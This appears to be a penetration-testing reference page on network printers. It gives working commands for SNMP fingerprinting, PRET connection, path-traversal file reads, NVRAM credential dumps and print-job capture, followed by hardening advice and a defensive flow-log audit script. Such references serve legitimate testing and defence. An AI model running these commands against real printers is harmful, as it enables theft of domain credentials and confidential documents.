Network Printers (JetDirect)
aka jetdirect, pjl, ipp
Network printers speak raw PJL/PostScript on 9100 (plus IPP 631, LPD 515). With PRET you can read the filesystem, dump stored credentials and LDAP binds from NVRAM, and capture queued print jobs.
Ports
| Port | Proto | Notes |
|---|---|---|
| 9100 | tcp | raw printing (JetDirect / PJL) |
| 631 | tcp | IPP / CUPS |
| 515 | tcp | LPD |
Fingerprint
- Banner / SNMP sysDescr names the printer model
- 9100 accepts raw PJL commands
Key files
| Path | Holds | Sensitive |
|---|---|---|
| printer NVRAM / config | LDAP/SMB bind creds, admin password, wifi keys | sensitive |
Exploitation primitives
- PRET over PJL/PS: browse and read the printer filesystem
- Dump stored LDAP/SMB scan-to-folder credentials from NVRAM (often domain accounts)
- Capture or replay queued print jobs; some models allow firmware/RCE abuse
Overview
Printers are full computers that hold domain credentials (for scan-to-folder/LDAP) and queued documents. Raw PJL on 9100 plus PRET turns them into a credential source.
Enumeration
Identify the model over SNMP:
snmpget -v2c -c public <TARGET> 1.3.6.1.2.1.1.1.0
Connect with PRET (PJL):
python3 pret.py <TARGET> pjl
Loot the filesystem & creds
Inside PRET, browse and read files:
ls
cat ../../etc/passwd
nvram dump
nvram dump frequently reveals the LDAP/SMB bind account used for scan-to-folder.
Capture print jobs
capture start
Hardening
Set an admin/PJL password, disable raw 9100 where unused, store scan creds in a least-privilege account, and segment printers off the user VLAN.
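One way to check the segmentation and raw-9100 advice above against firewall or flow logs, as an added example that is not part of the original page. The CSV log layout, printer subnet, print-server address and sweep threshold are assumptions, and the sample records are constructed.

```python
import csv, io, ipaddress
from collections import defaultdict

PRINT_PORTS = {9100, 631, 515}                        # raw/PJL, IPP, LPD (ports table above)
PRINTER_NET = ipaddress.ip_network("10.20.30.0/24")   # assumed printer VLAN
PRINT_SERVERS = {"10.20.1.5"}                         # assumed sanctioned print server
SWEEP_THRESHOLD = 3                                   # distinct printers from one source

# Constructed sample flow records: timestamp,src,dst,dport,action
SAMPLE_FLOWS = """\
2024-05-01T09:00:01,10.20.1.5,10.20.30.11,9100,allow
2024-05-01T09:00:07,10.20.1.5,10.20.30.12,631,allow
2024-05-01T09:02:13,10.20.40.77,10.20.30.11,9100,allow
2024-05-01T09:02:14,10.20.40.77,10.20.30.12,9100,allow
2024-05-01T09:02:15,10.20.40.77,10.20.30.13,9100,allow
2024-05-01T09:03:40,10.20.40.80,10.20.30.11,515,deny
2024-05-01T09:04:02,10.20.40.81,10.20.30.11,443,allow
2024-05-01T09:05:30,10.20.40.82,10.20.30.14,631,allow
"""

def audit_flows(text):
    """Map each source that reached a printer's print port directly to what it touched."""
    hits = defaultdict(lambda: {"printers": set(), "ports": set()})
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue                                  # skip blank or malformed records
        _, src, dst, dport, action = row
        if ipaddress.ip_address(dst) not in PRINTER_NET or int(dport) not in PRINT_PORTS:
            continue                                  # not print traffic to the printer VLAN
        if action != "allow" or src in PRINT_SERVERS:
            continue                                  # blocked by policy, or the sanctioned path
        hits[src]["printers"].add(dst)
        hits[src]["ports"].add(int(dport))
    return {
        src: {
            "printers": sorted(h["printers"]),
            "ports": sorted(h["ports"]),
            "raw_9100": 9100 in h["ports"],           # reached the raw PJL port
            "sweep": len(h["printers"]) >= SWEEP_THRESHOLD,
        }
        for src, h in hits.items()
    }

if __name__ == "__main__":
    for src, finding in sorted(audit_flows(SAMPLE_FLOWS).items()):
        print(src, finding)
```

Any source in the result is a host that the segmentation rules let through to a printer without going via the print server; entries with `raw_9100` set are the ones to close first.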